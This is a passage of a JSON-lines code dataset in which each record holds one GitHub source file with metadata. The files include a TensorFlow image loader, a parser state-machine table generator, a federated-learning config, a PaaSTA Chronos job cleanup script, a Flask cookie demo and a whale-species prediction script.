0.8\n self.train_features.extend(df[mask][\"path\"].tolist())\n self.train_labels.extend(df[mask][lable_column].tolist())\n self.val_features.extend(df[~mask][\"path\"].tolist())\n self.val_labels.extend(df[~mask][lable_column].tolist())\n print(f\"There are {len(self.train_features)} training images, {len(self.val_features)} validation images\")\n\n def load_from_path_label(self, path, label):\n image = tf.io.read_file(path)\n image = tf.image.decode_jpeg(image, channels=3)\n image = tf.image.resize(image, [self.input_width, self.input_height])\n return tf.cast(image, tf.float64), tf.cast(label, tf.float32)\n\n\ndef random_rotate(image, label):\n rn = tf.random.uniform(shape=(), maxval=4, dtype=tf.int32)\n return tf.image.rot90(image, rn), label\n\n\ndef random_flip(image, label):\n rn = tf.random.uniform(shape=(), maxval=1)\n return tf.cond(rn < 0.5,\n lambda: (image, label),\n lambda: (tf.image.flip_left_right(image), label))","repo_name":"sunzaimei/Carousell","sub_path":"model/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34313582514","text":"#!/usr/bin/env python\nfrom __future__ import print_function #just for parenthesis wrapping in python 2\n\n\"\"\"\nPython based parser state machine generator for xelp\n\nKona F Pance \n\nhistory:\n\treplaces original C hand coded version. manu originally wanted it in C but python is just easier. -kfp\n\n\tnote these are not general purpose state-machines but specifically designed to work the the compact state\n\tmachine parser in xelp.c\n\n\"\"\"\nimport argparse\nimport sys\nimport re\nimport pprint\n\n\"\"\"\nSimple parser state machine has these params per state:\n[current_state] [action-char] [action-flags] [ next-state]\n\nnotes:\n\tthe current-state is not stored. It is addressed via the companion jump table. \n\tthis saves storing redundant state info and improves run-time perf by not checking each state.\n\n\teach state *MUST* have a default catch-all or the run-time parser loop *WILL* hang. This is\n\taccomplished by having an action-char of 0 or '\\0'\n\n\texecFlags, parserStates are emitted as #defines in C.\n\n\"\"\" \n\ngLineTokStateMachine = { \n\t\"execFlags\" : [\n\t\t[\"_EF_TS\" ,\t\"(0x01)\", \"set token 0 start (1st token from buf start)\"],\n\t\t[\"_EF_TE\" ,\t\"(0x02)\", \"set token 0 end\" ], \n\t\t[\"_EF_LE\" ,\t\"(0x04)\", \"set line end\" ],\n\t],\n\t\"parserStates\" : [\t # list of state-names. must be in desired order. [\"state-name\",\"C comment\"]\n\t\t[\"_PS_SEEK\", \"seek next token0\"\t\t\t\t\t ],\n\t\t[\"_PS_ESCA\", \"esc sequence\" \t\t\t\t\t ],\n\t\t[\"_PS_TOK0\", \"token0 (the command / operator)\" ],\n\t\t[\"_PS_CMNT\", \"single-line comment\"\t\t\t\t ],\n\t\t[\"_PS_SEOL\", \"seek end-of-line\"\t\t\t\t\t ],\n\t\t[\"_PS_QUOT\", \"quoted string\"\t\t\t\t\t ],\n\t\t[\"_PS_QESC\", \"quoted esc char\"\t\t\t\t\t ],\n\t\t[\"_PS_QEND\", \"quoted end\"\t\t\t\t ],\n\t\t[\"_PS_PREV\", \"use previous state (spec case)\"\t ],\n\t\t[\"_PS_EOS \", \"end of table. actually never used\" ] #this should be last.\n\t],\n\t\"transTableName\" : \"gPSMStates\",\t\n\t\"transTable\" : [\t \n\t\t# state , char , exec , next_state, C comment \n\t\t[\"_PS_SEEK\" ,\" \" \t\t\t, 0, \"_PS_SEEK\", \"space is token separator\" ],\n\t\t[\"_PS_SEEK\" ,\"\\\\t\" , 0, \"_PS_SEEK\", \"tab is also token sep\" ],\n\t\t[\"_PS_SEEK\" ,\"\\\\n\" , 0, \"_PS_SEEK\", \"newline is token sep\" ],\n\t\t[\"_PS_SEEK\" ,\";\" , 0, \"_PS_SEEK\", \"; don't bother with termi if no tokn started\" ],\n\t\t[\"_PS_SEEK\" ,\"XELP_CLI_ESC\" , 0, \"_PS_ESCA\", \"enter CLI escape mode\" ],\n\t\t[\"_PS_SEEK\" ,\"#\" , 0, \"_PS_CMNT\", \"enter single line comment\" ],\n\t\t[\"_PS_SEEK\" ,\"\\\\\\\"\" ,\"_EF_TS\"\t , \"_PS_QUOT\", \"enter quoted string token\"\t\t\t\t ],\n\t\t[\"_PS_SEEK\" ,0\t\t\t ,\"_EF_TS\"\t , \"_PS_TOK0\", \"default .. enter token\" ],\n\t\t[\"_PS_ESCA\" ,0 , 0, \"_PS_PREV\", \"any char returns from esc state to pre stte\" ],\n\t\t[\"_PS_TOK0\" ,\" \"\t\t\t,\"_EF_TE\"\t\t , \"_PS_SEOL\", \"end of 1st token\"\t \t\t\t\t\t\t\t],\n\t\t[\"_PS_TOK0\" ,\"\\\\t\"\t\t\t,\"_EF_TE\"\t\t , \"_PS_SEOL\", \"end of 1st token\"\t \t\t\t\t\t\t\t],\n\t\t[\"_PS_TOK0\" ,\"#\"\t\t\t,\"_EF_TE | _EF_LE\" , \"_PS_CMNT\", \"end of line due to commnt, aslo end of token\" ],\n\t\t[\"_PS_TOK0\" ,\";\"\t\t\t,\"_EF_TE | _EF_LE\" , \"_PS_SEEK\", \"end of tok, terminator end of line\" ],\n\t\t[\"_PS_TOK0\" ,\"\\\\n\"\t\t\t,\"_EF_TE | _EF_LE\" , \"_PS_SEEK\", \"end of line, end of line\"\t\t\t\t\t\t],\n\t\t[\"_PS_TOK0\" ,0\t\t\t\t,\t\t\t\t 0, \"_PS_TOK0\", \"keep adding to token\"\t\t\t\t\t\t\t],\n\t\t[\"_PS_CMNT\" ,\"\\\\n\"\t\t\t,\t\t\t\t 0, \"_PS_SEEK\", \"end of line terminates comment\"\t\t\t\t],\n\t\t[\"_PS_CMNT\" ,0\t\t\t\t,\t\t\t\t 0, \"_PS_CMNT\", \"keep eating chars until eol reached\"\t\t\t],\n\t\t[\"_PS_SEOL\" ,\";\" \t\t\t,\"_EF_LE\" , \"_PS_SEEK\", \"end of statement reached\"\t\t\t\t\t\t],\n\t\t[\"_PS_SEOL\" ,\"\\\\n\" \t\t\t,\"_EF_LE\" , \"_PS_SEEK\", \"end of line reached\"\t\t\t\t\t\t\t],\n\t\t[\"_PS_SEOL\" ,\"#\" \t\t\t,\"_EF_LE\" , \"_PS_CMNT\", \"comment start\"\t\t\t\t\t\t\t\t],\n\t\t[\"_PS_SEOL\" ,\"XELP_CLI_ESC\" \t,\t\t\t 0, \"_PS_ESCA\", \"esc char -- skip next char\"\t\t\t\t\t],\n\t\t[\"_PS_SEOL\" ,\"\\\\\\\"\" \t\t,\t\t\t\t 0, \"_PS_QUOT\", \"enter quoted str (uses diff esc, exit states)\"],\n\t\t[\"_PS_SEOL\" ,0 \t\t\t\t,\t\t\t\t 0, \"_PS_SEOL\", \"keep seeking EOL\"\t\t\t\t\t\t\t\t],\n\t\t[\"_PS_QUOT\" ,\"\\\\\\\"\"\t\t\t, 0, \"_PS_QEND\", \"hit end of quote, go to QEND to advnce 1 char\"],\n\t\t[\"_PS_QUOT\" ,\"XELP_QUO_ESC\" , 0, \"_PS_QESC\", \"handle esc inside quoted str\" \t\t\t ], \n\t\t[\"_PS_QUOT\" ,0\t\t\t\t, 0, \"_PS_QUOT\", \"keep going thru quoted string\"\t\t\t\t],\n\t\t[\"_PS_QESC\" ,0 , 0, \"_PS_QUOT\", \"skip over next char (esc'd)\" ],\n\t\t[\"_PS_QEND\" ,\"#\" ,\"_EF_TE | _EF_LE\" , \"_PS_CMNT\", \"exit quote in to comment\" ],\n\t\t[\"_PS_QEND\" ,\";\" ,\"_EF_TE | _EF_LE\" , \"_PS_SEEK\", \"exit quote with terminal\"\t\t\t\t\t\t],\n\t\t[\"_PS_QEND\" ,\"\\\\n\" ,\"_EF_TE | _EF_LE\" , \"_PS_SEEK\", \"exit quote at end of line\"\t\t\t\t\t],\n\t\t[\"_PS_QEND\" ,0 ,\"_EF_TE\" , \"_PS_SEOL\", \"exit quote\"\t\t\t\t\t\t\t\t\t],\n\t\t],\n\t\t\"jumpTableName\" : \"gPSMJumpTable\"\n}\n#*********************************************************************************************************************\ngLineTokStateMachineWBrackets = { \n\t\"execFlags\" : [\n\t\t[\"_EF_TS\" ,\t\"(0x01)\", \"set token 0 start (1st token from buf start)\"],\n\t\t[\"_EF_TE\" ,\t\"(0x02)\", \"set token 0 end\" ], \n\t\t[\"_EF_LE\" ,\t\"(0x04)\", \"set line end\" ],\n\t\t[\"_EF_BS\" , \"(0x08)\", \"set bracket start\" ],\n\t\t[\"_EF_BE\" , \"(0x10)\", \"set bracket end\" ]\n\t\t\t\n\t],\n\t\"parserStates\" : [\t # list of state-names. must be in desired order. [\"state-name\",\"C comment\"]\n\t\t[\"_PS_SEEK\", \"seek next token0\"\t\t\t\t\t ],\n\t\t[\"_PS_ESCA\", \"esc sequence\" \t\t\t\t\t ],\n\t\t[\"_PS_TOK0\", \"token0 (the command / operator)\" ],\n\t\t[\"_PS_CMNT\", \"single-line comment\"\t\t\t\t ],\n\t\t[\"_PS_SEOL\", \"seek end-of-line\"\t\t\t\t\t ],\n\t\t[\"_PS_QUOT\", \"quoted string\"\t\t\t\t\t ],\n\t\t[\"_PS_QESC\", \"quoted esc char\"\t\t\t\t\t ],\n\t\t[\"_PS_QEND\", \"quoted end\"\t\t\t\t ],\n\t\t[\"_PS_PREV\", \"use previous state (spec case)\"\t ],\n\t\t[\"_PS_BRKT\", \"bracket\" ],\n\t\t[\"_PS_EOS \", \"end of table. actually never used\" ] #this should be last.\n\t],\n\t\"transTableName\" : \"gPSMStates\",\t\n\t\"transTable\" : [\t \n\t\t# state , char , exec , next_state, C comment \n\t\t[\"_PS_SEEK\" ,\" \" \t\t\t, 0, \"_PS_SEEK\", \"space is token separator\" ],\n\t\t[\"_PS_SEEK\" ,\"\\\\t\" , 0, \"_PS_SEEK\", \"tab is also token sep\" ],\n\t\t[\"_PS_SEEK\" ,\"\\\\n\" , 0, \"_PS_SEEK\", \"newline is token sep\" ],\n\t\t[\"_PS_SEEK\" ,\";\" , 0, \"_PS_SEEK\", \"; don't bother with termi if no tokn started\" ],\n\t\t[\"_PS_SEEK\" ,\"XELP_CLI_ESC\" , 0, \"_PS_ESCA\", \"enter CLI escape mode\" ],\n\t\t[\"_PS_SEEK\" ,\"#\" , 0, \"_PS_CMNT\", \"enter single line comment\" ],\n\t\t[\"_PS_SEEK\" ,\"\\\\\\\"\" ,\"_EF_TS\"\t , \"_PS_QUOT\", \"enter quoted string token\"\t\t\t\t ],\n\t\t[\"_PS_SEEK\" ,\"[\" ,\"_EF_TS | _EF_BS\" , \"_PS_BRKT\", \"enter bracket inc bracket level count\"\t\t],\n\t\t[\"_PS_SEEK\" ,0\t\t\t ,\"_EF_TS\"\t , \"_PS_TOK0\", \"default .. enter token\" ],\n\t\t[\"_PS_ESCA\" ,0 , 0, \"_PS_PREV\", \"any char retrns from esc state to pre state\" ],\n\t\t[\"_PS_BRKT\" ,\"XELP_CLI_ESC\" , 0, \"_PS_ESCA\", \"enter CLI escape mode\" ],\n\t\t[\"_PS_BRKT\" ,\"[\" ,\"_EF_BS\" , \"_PS_BRKT\", \"enter bracket, inc bracket level count\" ],\n\t\t[\"_PS_BRKT\" ,\"]\" ,\"_EF_BE\" , \"_PS_PREV\", \"decrement bracket\" ],\n\t\t[\"_PS_BRKT\" ,0 , 0, \"_PS_BRKT\", \"eat up chars in side bracket\" ],\n\t\t[\"_PS_TOK0\" ,\" \"\t\t\t,\"_EF_TE\"\t\t , \"_PS_SEOL\", \"end of 1st token\"\t \t\t\t\t\t\t\t],\n\t\t[\"_PS_TOK0\" ,\"\\\\t\"\t\t\t,\"_EF_TE\"\t\t , \"_PS_SEOL\", \"end of 1st token\"\t \t\t\t\t\t\t\t],\n\t\t[\"_PS_TOK0\" ,\"#\"\t\t\t,\"_EF_TE | _EF_LE\" , \"_PS_CMNT\", \"end of line due to commnt, aslo end of token\" ],\n\t\t[\"_PS_TOK0\" ,\";\"\t\t\t,\"_EF_TE | _EF_LE\" , \"_PS_SEEK\", \"end of tok, terminator end of line\" ],\n\t\t[\"_PS_TOK0\" ,\"\\\\n\"\t\t\t,\"_EF_TE | _EF_LE\" , \"_PS_SEEK\", \"end of line, end of line\"\t\t\t\t\t\t],\n\t\t[\"_PS_TOK0\" ,0\t\t\t\t,\t\t\t\t 0, \"_PS_TOK0\", \"keep adding to token\"\t\t\t\t\t\t\t],\n\t\t[\"_PS_CMNT\" ,\"\\\\n\"\t\t\t,\t\t\t\t 0, \"_PS_SEEK\", \"end of line terminates comment\"\t\t\t\t],\n\t\t[\"_PS_CMNT\" ,0\t\t\t\t,\t\t\t\t 0, \"_PS_CMNT\", \"keep eating chars until eol reached\"\t\t\t],\n\t\t[\"_PS_SEOL\" ,\";\" \t\t\t,\"_EF_LE\" , \"_PS_SEEK\", \"end of statement reached\"\t\t\t\t\t\t],\n\t\t[\"_PS_SEOL\" ,\"\\\\n\" \t\t\t,\"_EF_LE\" , \"_PS_SEEK\", \"end of line reached\"\t\t\t\t\t\t\t],\n\t\t[\"_PS_SEOL\" ,\"#\" \t\t\t,\"_EF_LE\" , \"_PS_CMNT\", \"comment start\"\t\t\t\t\t\t\t\t],\n\t\t[\"_PS_SEOL\" ,\"XELP_CLI_ESC\" \t,\t\t\t\t 0, \"_PS_ESCA\", \"esc char -- skip next char\"\t\t\t\t\t],\n\t\t[\"_PS_SEOL\" ,\"\\\\\\\"\" \t\t,\t\t\t\t 0, \"_PS_QUOT\", \"enter quoted str (uses diff esc, exit states)\"],\n\t\t[\"_PS_SEOL\" ,0 \t\t\t\t,\t\t\t\t 0, \"_PS_SEOL\", \"keep seeking EOL\"\t\t\t\t\t\t\t\t],\n\t\t[\"_PS_QUOT\" ,\"\\\\\\\"\"\t\t\t, 0, \"_PS_QEND\", \"hit end of quote, go to QEND to advnce 1 char\"],\n\t\t[\"_PS_QUOT\" ,\"XELP_QUO_ESC\" , 0, \"_PS_QESC\", \"handle esc inside quoted str\" \t\t\t ], \n\t\t[\"_PS_QUOT\" ,0\t\t\t\t, 0, \"_PS_QUOT\", \"keep going thru quoted string\"\t\t\t\t],\n\t\t[\"_PS_QESC\" ,0 , 0, \"_PS_QUOT\", \"skip over next char (esc'd)\" ],\n\t\t[\"_PS_QEND\" ,\"#\" ,\"_EF_TE | _EF_LE\" , \"_PS_CMNT\", \"exit quote in to comment\" ],\n\t\t[\"_PS_QEND\" ,\";\" ,\"_EF_TE | _EF_LE\" , \"_PS_SEEK\", \"exit quote with terminal\"\t\t\t\t\t\t],\n\t\t[\"_PS_QEND\" ,\"\\\\n\" ,\"_EF_TE | _EF_LE\" , \"_PS_SEEK\", \"exit quote at end of line\"\t\t\t\t\t],\n\t\t[\"_PS_QEND\" ,0 ,\"_EF_TE\" , \"_PS_SEOL\", \"exit quote\"\t\t\t\t\t\t\t\t\t],\n\t\t],\n\t\t\"jumpTableName\" : \"gPSMJumpTable\"\n}\n\n\ndef emitStateMachineFile(fname, smdata):\n\twith open(fname, 'w') as f:\n\t\t#f.write(str(gLineTokStateMachine));\n\t\tp = smdata\n\t\tf.write(\"/**\\n begin parser state machine model.\\n */\\n\")\n\t\t#first write #defines for exec-flags\n\t\tfor i in range(len(p[\"execFlags\"])):\n\t\t\tf.write(\"#define \"+p[\"execFlags\"][i][0]+\" \"+p[\"execFlags\"][i][1]+ \" /* \" + p[\"execFlags\"][i][2] + \" */\\n\")\n\t\tf.write(\"\\n\")\n\n\t\t#write out the #defines for the parser states\n\t\tfor i in range(len(p[\"parserStates\"])):\n\t\t\tf.write(\"#define \"+p[\"parserStates\"][i][0]+\" (0x\"+'%02x'%i +\") /* \" + p[\"parserStates\"][i][1] + \" */\\n\")\n\t\tf.write(\"\\n\")\n\n\t\t#write out table for the state machine transitions.\n\t\t#todo add error checking such as missing default (0) clause in a state\n\t\tf.write(\"static const char \"+ p[\"transTableName\"]+\"[\"+ str(len(p[\"transTable\"])*3+1)+ \"]= {\\n\")\n\t\tsz = 0\n\t\tez = 0\n\t\tcz = 0\n\t\tfor i in range(len(p[\"transTable\"])):\n\t\t\t#print(\"i \" + str(i) + \" : \" + str(p[\"transTable\"][i][0]))\n\t\t\tif len(str(p[\"transTable\"][i][1])) > sz:\n\t\t\t\tsz = len(str(p[\"transTable\"][i][1]))\n\t\t\tif len(str(p[\"transTable\"][i][2])) > ez:\n\t\t\t\tez = len(str(p[\"transTable\"][i][2]))\n\t\t\tif len(str(p[\"transTable\"][i][4])) > cz:\n\t\t\t\tcz = len(str(p[\"transTable\"][i][4]))\n\t\tsz += 2\n\t\tez += 2\n\t\tcz += 2\n\t\tfor i in range(len(p[\"transTable\"])):\n\t\t\tr = p[\"transTable\"][i]\n\t\t\t#f.write(str(r)+\"\\n\")\n\t\t\ts = (sz-len(str(r[1])))*\" \"\n\t\t\te = (ez-len(str(r[2])))*\" \"\n\t\t\tc = (cz-len(str(r[4])))*\" \"\n\t\t\tif ((str(r[1])[0:3] == \"XELP\") or (r[1]==0)):\n\t\t\t\tq=\" \"\n\t\t\telse:\n\t\t\t\tq=\"'\"\n\t\t\tf.write(\"/* \"+r[0]+\" */ \"+q + str(r[1])+q+s + \",\" + str(r[2]) +e+ \",\" + r[3] + \", /*\" + r[4] +c+\" */\\n\")\n\t\tf.write(\" _PS_EOS\\n\")\n\t\tf.write(\"};\\n\\n\")\n\n\t\t#write out jump table\n\t\t\n\t\tstate = \"\"\n\t\tjumpt = []\n\t\tfor i in range(len(p[\"transTable\"])):\n\t\t\tr = p[\"transTable\"][i]\n\t\t\tif r[0] != state:\n\t\t\t\tjumpt.append( [r[0], str(i*3)])\n\t\t\tstate = r[0]\n\t\tf.write(\"char \"+p[\"jumpTableName\"]+\"[\" +str(len(jumpt))+\"]= {\\n\")\n\t\tk = 0\n\t\tfor i in range(len(jumpt)):\n\t\t\tif k< (len(jumpt)-1):\n\t\t\t\tcom = \",\"\n\t\t\telse:\n\t\t\t\tcom = \" \"\n\t\t\tk += 1\n\t\t\tf.write(\" \" + jumpt[i][1] + com + \"/* \"+ jumpt[i][0] + \" */\\n\")\n\t\tf.write(\"};\\n\")\n\ndef main():\n\tparser = argparse.ArgumentParser(description='deftio xelp parser statemachine builder')\n\tparser.add_argument('-p','--psm_tables', help='output file for basic parser state table', required=False, default=\"xelp_psm_tables.c\")\n\tparser.add_argument('-b','--psm_w_brkts', help='output file parser state table with brackets support', required=False,default=\"xelp_psm_tables_brkts.c\")\n\n\targs = vars(parser.parse_args())\n\n\t#print(\"xelp state-machine parser table generator\\n\")\n\temitStateMachineFile(args[\"psm_tables\"],gLineTokStateMachine)\n\temitStateMachineFile(args[\"psm_w_brkts\"],gLineTokStateMachineWBrackets)\nif __name__ == '__main__':\n main()\n","repo_name":"deftio/xelp","sub_path":"tools/xelp_parser_sm_gen.py","file_name":"xelp_parser_sm_gen.py","file_ext":"py","file_size_in_byte":12884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"44235098678","text":"fmnist_noise_baseline_config = {\n \"partition\": \"homo\",\n \"round\": 50,\n \"network\": \"simple-cnn\",\n \"sample_ratio\": 1,\n \"dataset\": \"fmnist\",\n \"total_client_num\": 10,\n \"lr\": 0.01,\n \"momentum\": 0.9,\n \"weight_decay\": 1e-5,\n \"batch_size\": 64,\n \"test_batch_size\": 32,\n \"epochs\": 10\n}\n","repo_name":"SMILELab-FL/FedLab-benchmarks","sub_path":"fedlab_benchmarks/feature-skew-fedavg/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"67"} +{"seq_id":"10913928801","text":"import argparse\nimport datetime\nimport sys\n\nimport dateutil.parser\nimport pysensu_yelp\n\nfrom paasta_tools import chronos_tools\nfrom paasta_tools import monitoring_tools\nfrom paasta_tools import utils\nfrom paasta_tools.check_chronos_jobs import check_chronos_job_name\nfrom paasta_tools.utils import InvalidJobNameError\nfrom paasta_tools.utils import NoConfigurationForServiceError\nfrom paasta_tools.utils import paasta_print\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Cleans up stale chronos jobs.')\n parser.add_argument(\n '-d', '--soa-dir', dest=\"soa_dir\", metavar=\"SOA_DIR\",\n default=chronos_tools.DEFAULT_SOA_DIR,\n help=\"define a different soa config directory\",\n )\n args = parser.parse_args()\n return args\n\n\ndef execute_chronos_api_call_for_job(api_call, job):\n \"\"\"Attempt a call to the Chronos api, catching any exception.\n\n We *have* to catch Exception, because the client catches\n the more specific exception thrown by the http clients\n and rethrows an Exception -_-.\n\n The chronos api returns a 204 No Content when the delete is\n successful, and chronos-python only returns the body of the\n response from all http calls. So, if this is successful,\n then None will be returned.\n https://github.com/asher/chronos-python/pull/7\n\n We catch it here, so that the other deletes are completed.\n \"\"\"\n try:\n return api_call(job)\n except Exception as e:\n return e\n\n\ndef cleanup_jobs(client, jobs):\n \"\"\"Maps a list of jobs to cleanup to a list of response objects (or exception objects) from the api\"\"\"\n return [(job, execute_chronos_api_call_for_job(client.delete, job)) for job in jobs]\n\n\ndef cleanup_tasks(client, jobs):\n \"\"\"Maps a list of tasks to cleanup to a list of response objects (or exception objects) from the api\"\"\"\n return [(job, execute_chronos_api_call_for_job(client.delete_tasks, job)) for job in jobs]\n\n\ndef format_list_output(title, job_names):\n return '{}\\n {}'.format(title, '\\n '.join(job_names))\n\n\ndef deployed_job_names(client):\n return [job['name'] for job in client.list()]\n\n\ndef filter_paasta_jobs(jobs):\n \"\"\"\n Given a list of job name strings, return only those in the format PaaSTA expects.\n\n :param jobs: a list of job names.\n :returns: those job names in a format PaaSTA expects\n \"\"\"\n formatted = []\n for job in jobs:\n try:\n # attempt to decompose it\n service, instance = chronos_tools.decompose_job_id(job)\n formatted.append(job)\n except InvalidJobNameError:\n pass\n return formatted\n\n\ndef filter_tmp_jobs(job_names):\n \"\"\"\n filter temporary jobs created by chronos_rerun\n \"\"\"\n return [name for name in job_names if name.startswith(chronos_tools.TMP_JOB_IDENTIFIER)]\n\n\ndef filter_expired_tmp_jobs(client, job_names, cluster, soa_dir):\n \"\"\"\n Given a list of temporary jobs, find those ready to be removed. Their\n suitability for removal is defined by two things:\n\n - the job has completed (irrespective of whether it was a success or\n failure)\n - the job completed more than 24 hours ago\n \"\"\"\n expired = []\n for job_name in job_names:\n service, instance = chronos_tools.decompose_job_id(job_name)\n temporary_jobs = chronos_tools.get_temporary_jobs_for_service_instance(\n client=client,\n service=service,\n instance=instance,\n )\n for job in temporary_jobs:\n last_run_time, last_run_state = chronos_tools.get_status_last_run(job)\n try:\n chronos_job_config = chronos_tools.load_chronos_job_config(\n service=service,\n instance=instance,\n cluster=cluster,\n soa_dir=soa_dir,\n )\n interval = chronos_job_config.get_schedule_interval_in_seconds() or 0\n except NoConfigurationForServiceError:\n # If we can't get the job's config, default to cleanup after 1 day\n interval = 0\n if last_run_state != chronos_tools.LastRunState.NotRun:\n if ((datetime.datetime.now(dateutil.tz.tzutc()) -\n dateutil.parser.parse(last_run_time)) >\n max(datetime.timedelta(seconds=interval), datetime.timedelta(days=1))):\n expired.append(job_name)\n return expired\n\n\ndef main():\n\n args = parse_args()\n soa_dir = args.soa_dir\n\n config = chronos_tools.load_chronos_config()\n client = chronos_tools.get_chronos_client(config)\n\n system_paasta_config = utils.load_system_paasta_config()\n cluster = system_paasta_config.get_cluster()\n\n running_jobs = set(deployed_job_names(client))\n\n expected_service_jobs = {chronos_tools.compose_job_id(*job) for job in\n chronos_tools.get_chronos_jobs_for_cluster(soa_dir=args.soa_dir)}\n\n all_tmp_jobs = set(filter_tmp_jobs(filter_paasta_jobs(running_jobs)))\n expired_tmp_jobs = set(filter_expired_tmp_jobs(client, all_tmp_jobs, cluster=cluster, soa_dir=soa_dir))\n valid_tmp_jobs = all_tmp_jobs - expired_tmp_jobs\n\n to_delete = running_jobs - expected_service_jobs - valid_tmp_jobs\n\n task_responses = cleanup_tasks(client, to_delete)\n task_successes = []\n task_failures = []\n for response in task_responses:\n if isinstance(response[-1], Exception):\n task_failures.append(response)\n else:\n task_successes.append(response)\n\n job_responses = cleanup_jobs(client, to_delete)\n job_successes = []\n job_failures = []\n for response in job_responses:\n if isinstance(response[-1], Exception):\n job_failures.append(response)\n else:\n job_successes.append(response)\n try:\n (service, instance) = chronos_tools.decompose_job_id(response[0])\n monitoring_tools.send_event(\n check_name=check_chronos_job_name(service, instance),\n service=service,\n overrides={},\n soa_dir=soa_dir,\n status=pysensu_yelp.Status.OK,\n output=\"This instance was removed and is no longer supposed to be scheduled.\",\n )\n except InvalidJobNameError:\n # If we deleted some bogus job with a bogus jobid that could not be parsed,\n # Just move on, no need to send any kind of paasta event.\n pass\n\n if len(to_delete) == 0:\n paasta_print('No Chronos Jobs to remove')\n else:\n if len(task_successes) > 0:\n paasta_print(format_list_output(\n \"Successfully Removed Tasks (if any were running) for:\",\n [job[0] for job in task_successes],\n ))\n\n # if there are any failures, print and exit appropriately\n if len(task_failures) > 0:\n paasta_print(format_list_output(\"Failed to Delete Tasks for:\", [job[0] for job in task_failures]))\n\n if len(job_successes) > 0:\n paasta_print(format_list_output(\"Successfully Removed Jobs:\", [job[0] for job in job_successes]))\n\n # if there are any failures, print and exit appropriately\n if len(job_failures) > 0:\n paasta_print(format_list_output(\"Failed to Delete Jobs:\", [job[0] for job in job_failures]))\n\n if len(job_failures) > 0 or len(task_failures) > 0:\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"eric-erki/An-open-distributed-platform-as-a-service","sub_path":"paasta_tools/cleanup_chronos_jobs.py","file_name":"cleanup_chronos_jobs.py","file_ext":"py","file_size_in_byte":7556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10401018503","text":"from flask import Flask,request,Response\r\n\r\napp=Flask(__name__)\r\n\r\n@app.route('/cookie_set')\r\ndef cookieSet():\r\n res=Response(\"CooKie Setting\")\r\n res.set_cookie(\"Name\",\"Cookie Test\")\r\n\r\n return res\r\n\r\n@app.route('/cookie_out')\r\ndef cout():\r\n res = Response('Cookie Delete')\r\n res.set_cookie('Name',expires=0)\r\n\r\n return res\r\n@app.route('/cookie_status')\r\ndef cstatus():\r\n return \"Name's Value = %s\"%request.cookies.get('Name','') \r\n\r\nif __name__=='__main__':\r\n app.run()\r\n \r\n","repo_name":"mina0502/Project","sub_path":"WebPrograminig_Py/Web_ex23/ex23_1.py","file_name":"ex23_1.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71030648535","text":"# These library are for data manipulation \nimport numpy as np\nimport pandas as pd\n\n# These library are for working with directories\nimport os\nfrom glob import glob\nfrom tqdm import tqdm\n\n# These library are for Visualization\nimport matplotlib.pyplot as plt\nimport plotly.express as px\nfrom PIL import Image\nimport argparse\n# These library are for the Dataset\nfrom sklearn.model_selection import train_test_split\nfrom datetime import datetime\n# These Library are for converting Label Encoding\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import OneHotEncoder\n\n# These library are for loading Model\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.applications.imagenet_utils import preprocess_input\nfrom tensorflow import keras\nimport os\nimport sys\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n\ndef prepare_labels(y):\n values = np.array(y)\n label_encoder = LabelEncoder()\n integer_encoded = label_encoder.fit_transform(values)\n onehot_encoder = OneHotEncoder(sparse=False)\n integer_encoded = integer_encoded.reshape(len(integer_encoded), 1)\n onehot_encoded = onehot_encoder.fit_transform(integer_encoded)\n y = onehot_encoded\n return y, label_encoder\n\ndef main():\n\n parser = argparse.ArgumentParser(description=\"Cleaning preprocessed data.\")\n parser.add_argument(\n \"--image_path\",\n type=str,\n help=\"The path to the image file.\",\n )\n parser.add_argument(\n \"--model_path\",\n default=\"Saved_models/model.h5\",\n type=str,\n help=\"The path to the model chosen. Default: `Saved_models/model.h5`.\",\n )\n opt = parser.parse_args()\n START_DATETIME = datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n\n path=os.getcwd() \n\n X_train = np.zeros((1, 32, 32, 3))\n img = image.load_img(opt.image_path,target_size=(32, 32, 3))\n X = image.img_to_array(img)\n X = preprocess_input(X)\n X_train[0] = X\n X_train /= 255\n model = keras.models.load_model(opt.model_path)\n\n \n pridictions=model.predict(np.array(X_train), verbose=1)\n\n\n path_traindata = path+'/csv/train.csv'\n train_df = pd.read_csv(path_traindata)\n train_df = train_df.drop_duplicates(subset=['individual_id'],keep='last')\n y, label_encoder = prepare_labels(train_df['individual_id'])\n \n for i, pred in enumerate(pridictions):\n p = pred.argsort()[-5:][::-1]\n for x in p:\n s = label_encoder.inverse_transform(p)[0]\n prediction_got = s\n\n y_result=train_df.loc[(train_df[\"individual_id\"]==prediction_got)]\n\n print(\"The species that the model has pridicted is: \",y_result[\"species\"].to_string(index=False))\n\n \n\n\n\nif __name__ == '__main__':\n main()","repo_name":"dksath/whale_competition","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"38064682600","text":"from data.classes.diplomat_viewable import DiplomatViewable\n\nclass Board(DiplomatViewable):\n\tdef __init__(self, name):\n\t\tnames = [name]\n\n\t\tsuper().__init__(names)\n\n\t\tself.loadables = {}\n\t\tself.nations = []\n\t\tself.territories = []\n\t\tself.units = []\n\t\tself.turn_number = 0\n\n\tdef view_string(self):\n\t\treturn_string = str(self) + ':\\nLoadables: ' + str(len(self.loadables)) + '\\nNations:'\n\t\tfor nation in self.nations:\n\t\t\treturn_string += ',\\t' + str(nation)\n\t\treturn_string += '\\nTerritories:'\n\t\tfor territory in 